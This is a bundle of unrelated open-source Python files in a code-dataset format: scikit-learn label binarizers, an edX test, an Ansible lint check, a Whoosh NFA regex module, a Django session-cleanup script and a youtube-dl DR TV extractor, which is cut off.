utils.multiclass.type_of_target. Possible type are 'continuous',
'continuous-multioutput', 'binary', 'multiclass',
'mutliclass-multioutput', 'multilabel-indicator', and 'unknown'.
multilabel_ : boolean
True if the transformer was fitted on a multilabel rather than a
multiclass set of labels. The ``multilabel_`` attribute is deprecated
and will be removed in 0.18
sparse_input_ : boolean,
True if the input data to transform is given as a sparse matrix, False
otherwise.
indicator_matrix_ : str
'sparse' when the input data to tansform is a multilable-indicator and
is sparse, None otherwise. The ``indicator_matrix_`` attribute is
deprecated as of version 0.16 and will be removed in 0.18
Examples
--------
>>> from sklearn import preprocessing
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit([1, 2, 6, 4, 2])
LabelBinarizer(neg_label=0, pos_label=1, sparse_output=False)
>>> lb.classes_
array([1, 2, 4, 6])
>>> lb.transform([1, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
Binary targets transform to a column vector
>>> lb = preprocessing.LabelBinarizer()
>>> lb.fit_transform(['yes', 'no', 'no', 'yes'])
array([[1],
[0],
[0],
[1]])
Passing a 2D matrix for multilabel classification
>>> import numpy as np
>>> lb.fit(np.array([[0, 1, 1], [1, 0, 0]]))
LabelBinarizer(neg_label=0, pos_label=1, sparse_output=False)
>>> lb.classes_
array([0, 1, 2])
>>> lb.transform([0, 1, 2, 1])
array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0]])
See also
--------
label_binarize : function to perform the transform operation of
LabelBinarizer with fixed classes.
"""
def __init__(self, neg_label=0, pos_label=1, sparse_output=False):
if neg_label >= pos_label:
raise ValueError("neg_label={0} must be strictly less than "
"pos_label={1}.".format(neg_label, pos_label))
if sparse_output and (pos_label == 0 or neg_label != 0):
raise ValueError("Sparse binarization is only supported with non "
"zero pos_label and zero neg_label, got "
"pos_label={0} and neg_label={1}"
"".format(pos_label, neg_label))
self.neg_label = neg_label
self.pos_label = pos_label
self.sparse_output = sparse_output
def fit(self, y):
"""Fit label binarizer
Parameters
----------
y : numpy array of shape (n_samples,) or (n_samples, n_classes)
Target values. The 2-d matrix should only contain 0 and 1,
represents multilabel classification.
Returns
-------
self : returns an instance of self.
"""
self.y_type_ = type_of_target(y)
if 'multioutput' in self.y_type_:
raise ValueError("Multioutput target data is not supported with "
"label binarization")
if _num_samples(y) == 0:
raise ValueError('y has 0 samples: %r' % y)
self.sparse_input_ = sp.issparse(y)
self.classes_ = unique_labels(y)
return self
def transform(self, y):
"""Transform multi-class labels to binary labels
The output of transform is sometimes referred to by some authors as the
1-of-K coding scheme.
Parameters
----------
y : numpy array or sparse matrix of shape (n_samples,) or
(n_samples, n_classes) Target values. The 2-d matrix should only
contain 0 and 1, represents multilabel classification. Sparse
matrix can be CSR, CSC, COO, DOK, or LIL.
Returns
-------
Y : numpy array or CSR matrix of shape [n_samples, n_classes]
Shape will be [n_samples, 1] for binary problems.
"""
check_is_fitted(self, 'classes_')
y_is_multilabel = type_of_target(y).startswith('multilabel')
if y_is_multilabel and not self.y_type_.startswith('multilabel'):
raise ValueError("The object was not fitted with multilabel"
" input.")
return label_binarize(y, self.classes_,
pos_label=self.pos_label,
neg_label=self.neg_label,
sparse_output=self.sparse_output)
def inverse_transform(self, Y, threshold=None):
"""Transform binary labels back to multi-class labels
Parameters
----------
Y : numpy array or sparse matrix with shape [n_samples, n_classes]
Target values. All sparse matrices are converted to CSR before
inverse transformation.
threshold : float or None
Threshold used in the binary and multi-label cases.
Use 0 when:
- Y contains the output of decision_function (classifier)
Use 0.5 when:
- Y contains the output of predict_proba
If None, the threshold is assumed to be half way between
neg_label and pos_label.
Returns
-------
y : numpy array or CSR matrix of shape [n_samples] Target values.
Notes
-----
In the case when the binary labels are fractional
(probabilistic), inverse_transform chooses the class with the
greatest value. Typically, this allows to use the output of a
linear model's decision_function method directly as the input
of inverse_transform.
"""
check_is_fitted(self, 'classes_')
if threshold is None:
threshold = (self.pos_label + self.neg_label) / 2.
if self.y_type_ == "multiclass":
y_inv = _inverse_binarize_multiclass(Y, self.classes_)
else:
y_inv = _inverse_binarize_thresholding(Y, self.y_type_,
self.classes_, threshold)
if self.sparse_input_:
y_inv = sp.csr_matrix(y_inv)
elif sp.issparse(y_inv):
y_inv = y_inv.toarray()
return y_inv
def label_binarize(y, classes, neg_label=0, pos_label=1, sparse_output=False):
"""Binarize labels in a one-vs-all fashion
Several regression and binary classification algorithms are
available in the scikit. A simple way to extend these algorithms
to the multi-class classification case is to use the so-called
one-vs-all scheme.
This function makes it possible to compute this transformation for a
fixed set of class labels known ahead of time.
Parameters
----------
y : array-like
Sequence of integer labels or multilabel data to encode.
classes : array-like of shape [n_classes]
Uniquely holds the label for each class.
neg_label : int (default: 0)
Value with which negative labels must be encoded.
pos_label : int (default: 1)
Value with which positive labels must be encoded.
sparse_output : boolean (default: False),
Set to true if output binary array is desired in CSR sparse format
Returns
-------
Y : numpy array or CSR matrix of shape [n_samples, n_classes]
Shape will be [n_samples, 1] for binary problems.
Examples
--------
>>> from sklearn.preprocessing import label_binarize
>>> label_binarize([1, 6], classes=[1, 2, 4, 6])
array([[1, 0, 0, 0],
[0, 0, 0, 1]])
The class ordering is preserved:
>>> label_binarize([1, 6], classes=[1, 6, 4, 2])
array([[1, 0, 0, 0],
[0, 1, 0, 0]])
Binary targets transform to a column vector
>>> label_binarize(['yes', 'no', 'no', 'yes'], classes=['no', 'yes'])
array([[1],
[0],
[0],
[1]])
See also
--------
LabelBinarizer : class used to wrap the functionality of label_binarize and
allow for fitting to classes independently of the transform operation
"""
if not isinstance(y, list):
# XXX Workaround that will be removed when list of list format is
# dropped
y = check_array(y, accept_sparse='csr', ensure_2d=False, dtype=None)
else:
if _num_samples(y) == 0:
raise ValueError('y has 0 samples: %r' % y)
if neg_label >= pos_label:
raise ValueError("neg_label={0} must be strictly less than "
"pos_label={1}.".format(neg_label, pos_label))
if (sparse_output and (pos_label == 0 or neg_label != 0)):
raise ValueError("Sparse binarization is only supported with non "
"zero pos_label and zero neg_label, got "
"pos_label={0} and neg_label={1}"
"".format(pos_label, neg_label))
# To account for pos_label == 0 in the dense case
pos_switch = pos_label == 0
if pos_switch:
pos_label = -neg_label
y_type = type_of_target(y)
if 'multioutput' in y_type:
raise ValueError("Multioutput target data is not supported with label "
"binarization")
if y_type == 'unknown':
raise ValueError("The type of target data is not known")
n_samples = y.shape[0] if sp.issparse(y) else len(y)
n_classes = len(classes)
classes = np.asarray(classes)
if y_type == "binary":
if len(classes) == 1:
Y = np.zeros((len(y), 1), dtype=np.int)
Y += neg_label
return Y
elif len(classes) >= 3:
y_type = "multiclass"
sorted_class = np.sort(classes)
if (y_type == "multilabel-indicator" and classes.size != y.shape[1]):
raise ValueError("classes {0} missmatch with the labels {1}"
"found in the data".format(classes, unique_labels(y)))
if y_type in ("binary", "multiclass"):
y = column_or_1d(y)
# pick out the known labels from y
y_in_classes = in1d(y, classes)
y_seen = y[y_in_classes]
indices = np.searchsorted(sorted_class, y_seen)
indptr = np.hstack((0, np.cumsum(y_in_classes)))
data = np.empty_like(indices)
data.fill(pos_label)
Y = sp.csr_matrix((data, indices, indptr),
shape=(n_samples, n_classes))
elif y_type == "multilabel-indicator":
Y = sp.csr_matrix(y)
if pos_label != 1:
data = np.empty_like(Y.data)
data.fill(pos_label)
Y.data = data
else:
raise ValueError("%s target data is not supported with label "
"binarization" % y_type)
if not sparse_output:
Y = Y.toarray()
Y = astype(Y, int, copy=False)
if neg_label != 0:
Y[Y == 0] = neg_label
if pos_switch:
Y[Y == pos_label] = 0
else:
Y.data = astype(Y.data, int, copy=False)
# preserve label ordering
if np.any(classes != sorted_class):
indices = np.searchsorted(sorted_class, classes)
Y = Y[:, indices]
if y_type == "binary":
if sparse_output:
Y = Y.getcol(-1)
else:
Y = Y[:, -1].reshape((-1, 1))
return Y
def _inverse_binarize_multiclass(y, classes):
"""Inverse label binarization transformation for multiclass.
Multiclass uses the maximal score instead of a threshold.
"""
classes = np.asarray(classes)
if sp.issparse(y):
# Find the argmax for each row in y where y is a CSR matrix
y = y.tocsr()
n_samples, n_outputs = y.shape
outputs = np.arange(n_outputs)
row_max = sparse_min_max(y, 1)[1]
row_nnz = np.diff(y.indptr)
y_data_repeated_max = np.repeat(row_max, row_nnz)
# picks out all indices obtaining the maximum per row
y_i_all_argmax = np.flatnonzero(y_data_repeated_max == y.data)
# For corner case where last row has a max of 0
if row_max[-1] == 0:
y_i_all_argmax = np.append(y_i_all_argmax, [len(y.data)])
# Gets the index of the first argmax in each row from y_i_all_argmax
index_first_argmax = np.searchsorted(y_i_all_argmax, y.indptr[:-1])
# first argmax of each row
y_ind_ext = np.append(y.indices, [0])
y_i_argmax = y_ind_ext[y_i_all_argmax[index_first_argmax]]
# Handle rows of all 0
y_i_argmax[np.where(row_nnz == 0)[0]] = 0
# Handles rows with max of 0 that contain negative numbers
samples = np.arange(n_samples)[(row_nnz > 0) &
(row_max.ravel() == 0)]
for i in samples:
ind = y.indices[y.indptr[i]:y.indptr[i + 1]]
y_i_argmax[i] = classes[np.setdiff1d(outputs, ind)][0]
return classes[y_i_argmax]
else:
return classes.take(y.argmax(axis=1), mode="clip")
def _inverse_binarize_thresholding(y, output_type, classes, threshold):
"""Inverse label binarization transformation using thresholding."""
if output_type == "binary" and y.ndim == 2 and y.shape[1] > 2:
raise ValueError("output_type='binary', but y.shape = {0}".
format(y.shape))
if output_type != "binary" and y.shape[1] != len(classes):
raise ValueError("The number of class is not equal to the number of "
"dimension of y.")
classes = np.asarray(classes)
# Perform thresholding
if sp.issparse(y):
if threshold > 0:
if y.format not in ('csr', 'csc'):
y = y.tocsr()
y.data = np.array(y.data > threshold, dtype=np.int)
y.eliminate_zeros()
else:
y = np.array(y.toarray() > threshold, dtype=np.int)
else:
y = np.array(y > threshold, dtype=np.int)
# Inverse transform data
if output_type == "binary":
if sp.issparse(y):
y = y.toarray()
if y.ndim == 2 and y.shape[1] == 2:
return classes[y[:, 1]]
else:
if len(classes) == 1:
y = np.empty(len(y), dtype=classes.dtype)
y.fill(classes[0])
return y
else:
return classes[y.ravel()]
elif output_type == "multilabel-indicator":
return y
else:
raise ValueError("{0} format is not supported".format(output_type))
class MultiLabelBinarizer(BaseEstimator, TransformerMixin):
"""Transform between iterable of iterables and a multilabel format
Although a list of sets or tuples is a very intuitive format for multilabel
data, it is unwieldy to process. This transformer converts between this
intuitive format and the supported multilabel format: a (samples x classes)
binary matrix indicating the presence of a class label.
Parameters
----------
classes : array-like of shape [n_classes] (optional)
Indicates an ordering for the class labels
sparse_output : boolean (default: False),
Set to true if output binary array is desired in CSR sparse format
Attributes
----------
classes_ : array of labels
A copy of the `classes` parameter where provided,
or otherwise, the sorted set of classes found when fitting.
Examples
--------
>>> mlb = MultiLabelBinarizer()
>>> mlb.fit_transform([(1, 2), (3,)])
array([[1, 1, 0],
[0, 0, 1]])
>>> mlb.classes_
array([1, 2, 3])
>>> mlb.fit_transform([set(['sci-fi', 'thriller']), set(['comedy'])])
array([[0, 1, 1],
[1, 0, 0]])
>>> list(mlb.classes_)
['comedy', 'sci-fi', 'thriller']
"""
def __init__(self, classes=None, sparse_output=False):
self.classes = classes
self.sparse_output = sparse_output
def fit(self, y):
"""Fit the label sets binarizer, storing `classes_`
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
self : returns this MultiLabelBinarizer instance
"""
if self.classes is None:
classes = sorted(set(itertools.chain.from_iterable(y)))
else:
classes = self.classes
dtype = np.int if all(isinstance(c, int) for c in classes) else object
self.classes_ = np.empty(len(classes), dtype=dtype)
self.classes_[:] = classes
return self
def fit_transform(self, y):
"""Fit the label sets binarizer and transform the given label sets
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
y_indicator : array or CSR matrix, shape (n_samples, n_classes)
A matrix such that `y_indicator[i, j] = 1` iff `classes_[j]` is in
`y[i]`, and 0 otherwise.
"""
if self.classes is not None:
return self.fit(y).transform(y)
# Automatically increment on new class
class_mapping = defaultdict(int)
class_mapping.default_factory = class_mapping.__len__
yt = self._transform(y, class_mapping)
# sort classes and reorder columns
tmp = sorted(class_mapping, key=class_mapping.get)
# (make safe for tuples)
dtype = np.int if all(isinstance(c, int) for c in tmp) else object
class_mapping = np.empty(len(tmp), dtype=dtype)
class_mapping[:] = tmp
self.classes_, inverse = np.unique(class_mapping, return_inverse=True)
yt.indices = np.take(inverse, yt.indices)
if not self.sparse_output:
yt = yt.toarray()
return yt
def transform(self, y):
"""Transform the given label sets
Parameters
----------
y : iterable of iterables
A set of labels (any orderable and hashable object) for each
sample. If the `classes` parameter is set, `y` will not be
iterated.
Returns
-------
y_indicator : array or CSR matrix, shape (n_samples, n_classes)
A matrix such that `y_indicator[i, j] = 1` iff `classes_[j]` is in
`y[i]`, and 0 otherwise.
"""
class_to_index = dict(zip(self.classes_, range(len(self.classes_))))
yt = self._transform(y, class_to_index)
if not self.sparse_output:
yt = yt.toarray()
return yt
def _transform(self, y, class_mapping):
"""Transforms the label sets with a given mapping
Parameters
----------
y : iterable of iterables
class_mapping : Mapping
Maps from label to column index in label indicator matrix
Returns
-------
y_indicator : sparse CSR matrix, shape (n_samples, n_classes)
Label indicator matrix
"""
indices = array.array('i')
indptr = array.array('i', [0])
for labels in y:
indices.extend(set(class_mapping[label] for label in labels))
indptr.append(len(indices))
data = np.ones(len(indices), dtype=int)
return sp.csr_matrix((data, indices, indptr),
shape=(len(indptr) - 1, len(class_mapping)))
def inverse_transform(self, yt):
"""Transform the given indicator matrix into label sets
Parameters
----------
yt : array or sparse matrix of shape (n_samples, n_classes)
A matrix containing only 1s ands 0s.
Returns
-------
y : list of tuples
The set of labels for each sample such that `y[i]` consists of
`classes_[j]` for each `yt[i, j] == 1`.
"""
if yt.shape[1] != len(self.classes_):
raise ValueError('Expected indicator for {0} classes, but got {1}'
.format(len(self.classes_), yt.shape[1]))
if sp.issparse(yt):
yt = yt.tocsr()
if len(yt.data) != 0 and len(np.setdiff1d(yt.data, [0, 1])) > 0:
raise ValueError('Expected only 0s and 1s in label indicator.')
return [tuple(self.classes_.take(yt.indices[start:end]))
for start, end in zip(yt.indptr[:-1], yt.indptr[1:])]
else:
unexpected = np.setdiff1d(yt, [0, 1])
if len(unexpected) > 0:
raise ValueError('Expected only 0s and 1s in label indicator. '
'Also got {0}'.format(unexpected))
return [tuple(self.classes_.compress(indicators)) for indicators
in yt]
|
eduNEXT/edx-platform | refs/heads/master | openedx/core/lib/tests/test_command_utils.py | 5 | """
Tests of management command utility code
"""
from unittest import TestCase
import ddt
import pytest
from django.core.management import CommandError
from .. import command_utils
@ddt.ddt
class MutuallyExclusiveRequiredOptionsTestCase(TestCase):
"""
Test that mutually exclusive required options allow one and only one option
to be specified with a true value.
"""
@ddt.data(
(['opta'], {'opta': 1}, 'opta'),
(['opta', 'optb'], {'opta': 1}, 'opta'),
(['opta', 'optb'], {'optb': 1}, 'optb'),
(['opta', 'optb'], {'opta': 1, 'optc': 1}, 'opta'),
(['opta', 'optb'], {'opta': 1, 'optb': 0}, 'opta'),
(['opta', 'optb', 'optc'], {'optc': 1, 'optd': 1}, 'optc'),
(['opta', 'optb', 'optc'], {'optc': 1}, 'optc'),
(['opta', 'optb', 'optc'], {'optd': 0, 'optc': 1}, 'optc'),
)
@ddt.unpack
def test_successful_exclusive_options(self, exclusions, opts, expected):
result = command_utils.get_mutually_exclusive_required_option(opts, *exclusions)
assert result == expected
@ddt.data(
(['opta'], {'opta': 0}),
(['opta', 'optb'], {'opta': 1, 'optb': 1}),
(['opta', 'optb'], {'optc': 1, 'optd': 1}),
(['opta', 'optb'], {}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optb': 1}),
(['opta', 'optb', 'optc'], {'optb': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {'opta': 1, 'optb': 1, 'optc': 1}),
(['opta', 'optb', 'optc'], {}),
)
@ddt.unpack
def test_invalid_exclusive_options(self, exclusions, opts):
with pytest.raises(CommandError):
command_utils.get_mutually_exclusive_required_option(opts, *exclusions)
|
anryko/ansible | refs/heads/devel | test/lib/ansible_test/_data/sanity/code-smell/no-basestring.py | 68 | #!/usr/bin/env python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import sys
def main():
for path in sys.argv[1:] or sys.stdin.read().splitlines():
with open(path, 'r') as path_fd:
for line, text in enumerate(path_fd.readlines()):
match = re.search(r'(isinstance.*basestring)', text)
if match:
print('%s:%d:%d: do not use `isinstance(s, basestring)`' % (
path, line + 1, match.start(1) + 1))
if __name__ == '__main__':
main()
|
betoesquivel/fil2014 | refs/heads/master | filenv/lib/python2.7/site-packages/whoosh/automata/nfa.py | 95 | # Copyright 2012 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from whoosh.automata.fst import Arc
class Instruction(object):
def __repr__(self):
return "%s()" % (self.__class__.__name__, )
class Char(Instruction):
"""
Matches a literal character.
"""
def __init__(self, c):
self.c = c
def __repr__(self):
return "Char(%r)" % self.c
class Lit(Instruction):
"""
Matches a literal string.
"""
def __init__(self, c):
self.c = c
def __repr__(self):
return "Lit(%r)" % self.c
class Any(Instruction):
"""
Matches any character.
"""
class Match(Instruction):
"""
Stop this thread: the string matched.
"""
def __repr__(self):
return "Match()"
class Jmp(Instruction):
"""
Jump to a specified instruction.
"""
def __init__(self, x):
self.x = x
def __repr__(self):
return "Jmp(%s)" % self.x
class Split(Instruction):
"""
Split execution: continue at two separate specified instructions.
"""
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return "Split(%s, %s)" % (self.x, self.y)
class Label(Instruction):
"""
Placeholder to act as a target for JMP instructions
"""
def __hash__(self):
return id(self)
def __repr__(self):
return "L(%s)" % hex(id(self))
def concat(e1, e2):
return e1 + e2
def alt(e1, e2):
L1, L2, L3 = Label(), Label(), Label()
return [L1] + e1 + [Jmp(L3), L2] + e2 + [L3]
def zero_or_one(e):
L1, L2 = Label(), Label()
return [Split(L1, L2), L1] + e + [L2]
def zero_or_more(e):
L1, L2, L3 = Label(), Label(), Label()
return [L1, Split(L2, L3), L2] + e + [Jmp(L1), L3]
def one_or_more(e):
L1, L2 = Label(), Label()
return [L1] + e + [Split(L1, L2), L2]
def fixup(program):
refs = {}
i = 0
while i < len(program):
op = program[i]
if isinstance(op, Label):
refs[op] = i
program.pop(i)
else:
i += 1
if refs:
for op in program:
if isinstance(op, (Jmp, Split)):
op.x = refs[op.x]
if isinstance(op, Split):
op.y = refs[op.y]
return program + [Match]
class ThreadList(object):
def __init__(self, program, max=1000):
self.program = program
self.max = max
self.threads = []
def __nonzero__(self):
return bool(self.threads)
def current(self):
return self.threads.pop()
def add(self, thread):
op = self.program[thread.pc]
optype = type(op)
if optype is Jmp:
self.add(thread.at(op.x))
elif optype is Split:
self.add(thread.copy_at(op.x))
self.add(thread.at(op.y))
else:
self.threads.append(thread)
class Thread(object):
def __init__(self, pc, address, sofar='', accept=False):
self.pc = pc
self.address = address
self.sofar = sofar
self.accept = accept
def at(self, pc):
self.pc = pc
return self
def copy_at(self, pc):
return Thread(pc, self.address, self.sofar, self.accept)
def __repr__(self):
d = self.__dict__
return "Thread(%s)" % ",".join("%s=%r" % (k, v) for k, v in d.items())
def advance(thread, arc, c):
thread.pc += 1
thread.address = arc.target
thread.sofar += c
thread.accept = arc.accept
def run(graph, program, address):
threads = ThreadList(program)
threads.add(Thread(0, address))
arc = Arc()
while threads:
thread = threads.current()
address = thread.address
op = program[thread.pc]
optype = type(op)
if optype is Char:
if address:
arc = graph.find_arc(address, op.c, arc)
if arc:
advance(thread, arc)
threads.add(thread)
elif optype is Lit:
if address:
c = op.c
arc = graph.find_path(c, arc, address)
if arc:
advance(thread, arc, c)
threads.add(thread)
elif optype is Any:
if address:
sofar = thread.sofar
pc = thread.pc + 1
for arc in graph.iter_arcs(address, arc):
t = Thread(pc, arc.target, sofar + arc.label, arc.accept)
threads.add(t)
elif op is Match:
if thread.accept:
yield thread.sofar
else:
raise Exception("Don't know what to do with %r" % op)
LO = 0
HI = 1
def regex_limit(graph, mode, program, address):
low = mode == LO
output = []
threads = ThreadList(program)
threads.add(Thread(0, address))
arc = Arc()
while threads:
thread = threads.current()
address = thread.address
op = program[thread.pc]
optype = type(op)
if optype is Char:
if address:
arc = graph.find_arc(address, op.c, arc)
if arc:
if low and arc.accept:
return thread.sofar + thread.label
advance(thread, arc)
threads.add(thread)
elif optype is Lit:
if address:
labels = op.c
for label in labels:
arc = graph.find_arc(address, label)
if arc is None:
return thread.sofar
elif thread.accept:
return thread.sofar
elif optype is Any:
if address:
if low:
arc = graph.arc_at(address, arc)
else:
for arc in graph.iter_arcs(address):
pass
advance(thread, arc, arc.label)
threads.add(thread)
elif thread.accept:
return thread.sofar
elif op is Match:
return thread.sofar
else:
raise Exception("Don't know what to do with %r" % op)
# if __name__ == "__main__":
# from whoosh import index, query
# from whoosh.filedb.filestore import RamStorage
# from whoosh.automata import fst
# from whoosh.util.testing import timing
#
# st = RamStorage()
# gw = fst.GraphWriter(st.create_file("test"))
# gw.start_field("test")
# for key in ["aaaa", "aaab", "aabb", "abbb", "babb", "bbab", "bbba"]:
# gw.insert(key)
# gw.close()
# gr = fst.GraphReader(st.open_file("test"))
#
# program = one_or_more([Lit("a")])
# print program
# program = fixup(program)
# print program
# print list(run(gr, program, gr.root("test")))
#
# ix = index.open_dir("e:/dev/src/houdini/help/index")
# r = ix.reader()
# gr = r._get_graph()
#
# # program = fixup([Any(), Any(), Any(), Any(), Any()])
# # program = fixup(concat(zero_or_more([Any()]), [Char("/")]))
# # with timing():
# # x = list(run(gr, program, gr.root("path")))
# # print len(x)
#
# q = query.Regex("path", "^.[abc].*/$")
# with timing():
# y = list(q._btexts(r))
# print len(y)
# print y[0], y[-1]
#
# pr = [Any()] + alt([Lit("c")], alt([Lit("b")], [Lit("a")])) + zero_or_more([Any()]) + [Lit("/")]
# program = fixup(pr)
# # with timing():
# # x = list(run(gr, program, gr.root("path")))
# # print len(x), x
#
# with timing():
# print "lo=", regex_limit(gr, LO, program, gr.root("path"))
# print "hi=", regex_limit(gr, HI, program, gr.root("path"))
#
#
#
# #int
# #backtrackingvm(Inst *prog, char *input)
# #{
# # enum { MAXTHREAD = 1000 };
# # Thread ready[MAXTHREAD];
# # int nready;
# # Inst *pc;
# # char *sp;
# #
# # /* queue initial thread */
# # ready[0] = thread(prog, input);
# # nready = 1;
# #
# # /* run threads in stack order */
# # while(nready > 0){
# # --nready; /* pop state for next thread to run */
# # pc = ready[nready].pc;
# # sp = ready[nready].sp;
# # for(;;){
# # switch(pc->opcode){
# # case Char:
# # if(*sp != pc->c)
# # goto Dead;
# # pc++;
# # sp++;
# # continue;
# # case Match:
# # return 1;
# # case Jmp:
# # pc = pc->x;
# # continue;
# # case Split:
# # if(nready >= MAXTHREAD){
# # fprintf(stderr, "regexp overflow");
# # return -1;
# # }
# # /* queue new thread */
# # ready[nready++] = thread(pc->y, sp);
# # pc = pc->x; /* continue current thread */
# # continue;
# # }
# # }
# # Dead:;
# # }
# # return 0;
# #}
#
#
|
apixandru/intellij-community | refs/heads/master | python/testData/refactoring/introduceVariable/substringInStatement.after.py | 83 | a = 'foo'
x = '%sbar' % a |
cubicova17/annet | refs/heads/master | venv/lib/python2.7/site-packages/django/bin/daily_cleanup.py | 113 | #!/usr/bin/env python
"""
Daily cleanup job.
Can be run as a cronjob to clean out old data from the database (only expired
sessions at the moment).
"""
import warnings
from django.core import management
if __name__ == "__main__":
warnings.warn(
"The `daily_cleanup` script has been deprecated "
"in favor of `django-admin.py clearsessions`.",
DeprecationWarning)
management.call_command('clearsessions')
|
tashaxe/Red-DiscordBot | refs/heads/develop | lib/youtube_dl/extractor/drtv.py | 10 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
int_or_none,
float_or_none,
mimetype2ext,
parse_iso8601,
remove_end,
update_url_query,
)
class DRTVIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv/se|nyheder|radio/ondemand)/(?:[^/]+/)*(?P<id>[\da-z-]+)(?:[/#?]|$)'
_GEO_BYPASS = False
_GEO_COUNTRIES = ['DK']
IE_NAME = 'drtv'
_TESTS = [{
'url': 'https://www.dr.dk/tv/se/boern/ultra/klassen-ultra/klassen-darlig-taber-10',
'md5': '25e659cccc9a2ed956110a299fdf5983',
'info_dict': {
'id': 'klassen-darlig-taber-10',
'ext': 'mp4',
'title': 'Klassen - Dårlig taber (10)',
'description': 'md5:815fe1b7fa656ed80580f31e8b3c79aa',
'timestamp': 1471991907,
'upload_date': '20160823',
'duration': 606.84,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.dr.dk/nyheder/indland/live-christianias-rydning-af-pusher-street-er-i-gang',
'md5': '2c37175c718155930f939ef59952474a',
'info_dict': {
'id': 'christiania-pusher-street-ryddes-drdkrjpo',
'ext': 'mp4',
'title': 'LIVE Christianias rydning af Pusher Street er i gang',
'description': '- Det er det fedeste, der er sket i 20 år, fortæller christianit til DR Nyheder.',
'timestamp': 1472800279,
'upload_date': '20160902',
'duration': 131.4,
},
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
if '>Programmet er ikke længere tilgængeligt' in webpage:
raise ExtractorError(
'Video %s is not available' % video_id, expected=True)
video_id = self._search_regex(
(r'data-(?:material-identifier|episode-slug)="([^"]+)"',
r'data-resource="[^>"]+mu/programcard/expanded/([^"]+)"'),
webpage, 'video id')
programcard = self._download_json(
'http://www.dr.dk/mu/programcard/expanded/%s' % video_id,
video_id, 'Downloading video JSON')
data = programcard['Data'][0]
title = remove_end(self._og_search_title(
webpage, default=None), ' | TV | DR') or data['Title']
description = self._og_search_description(
webpage, default=None) or data.get('Description')
timestamp = parse_iso8601(data.get('CreatedTime'))
thumbnail = None
duration = None
restricted_to_denmark = False
formats = []
subtitles = {}
for asset in data['Assets']:
kind = asset.get('Kind')
if kind == 'Image':
thumbnail = asset.get('Uri')
elif kind in ('VideoResource', 'AudioResource'):
duration = float_or_none(asset.get('DurationInMilliseconds'), 1000)
restricted_to_denmark = asset.get('RestrictedToDenmark')
spoken_subtitles = asset.get('Target') == 'SpokenSubtitles'
for link in asset.get('Links', []):
uri = link.get('Uri')
if not uri:
continue
target = link.get('Target')
format_id = target or ''
preference = None
if spoken_subtitles:
preference = -1
format_id += '-spoken-subtitles'
if target == 'HDS':
f4m_formats = self._extract_f4m_formats(
uri + '?hdcore=3.3.0&plugin=aasp-3.3.0.99.43',
video_id, preference, f4m_id=format_id)
if kind == 'AudioResource':
for f in f4m_formats:
f['vcodec'] = 'none'
formats.extend(f4m_formats)
elif target == 'HLS':
formats.extend(self._extract_m3u8_formats(
uri, video_id, 'mp4', entry_protocol='m3u8_native',
preference=preference, m3u8_id=format_id))
else:
bitrate = link.get('Bitrate')
if bitrate:
format_id += '-%s' % bitrate
formats.append({
'url': uri,
'format_id': format_id,
'tbr': int_or_none(bitrate),
'ext': link.get('FileFormat'),
'vcodec': 'none' if kind == 'AudioResource' else None,
})
subtitles_list = asset.get('SubtitlesList')
if isinstance(subtitles_list, list):
LANGS = {
'Danish': 'da',
}
for subs in subtitles_list:
if not subs.get('Uri'):
continue
lang = subs.get('Language') or 'da'
subtitles.setdefault(LANGS.get(lang, lang), []).append({
'url': subs['Uri'],
'ext': mimetype2ext(subs.get('MimeType')) or 'vtt'
})
if not formats and restricted_to_denmark:
self.raise_geo_restricted(
'Unfortunately, DR is not allowed to show this program outside Denmark.',
countries=self._GEO_COUNTRIES)
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'duration': duration,
'formats': formats,
'subtitles': subtitles,
}
class DRTVLiveIE(InfoExtractor):
IE_NAME = 'drtv:live'
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv|TV)/live/(?P<id>[\da-z-]+)'
_GEO_COUNTRIES = ['DK']
_TEST = {
'url': 'https://www.dr.dk/tv/live/dr1',
'info_dict': {
'id': 'dr1',
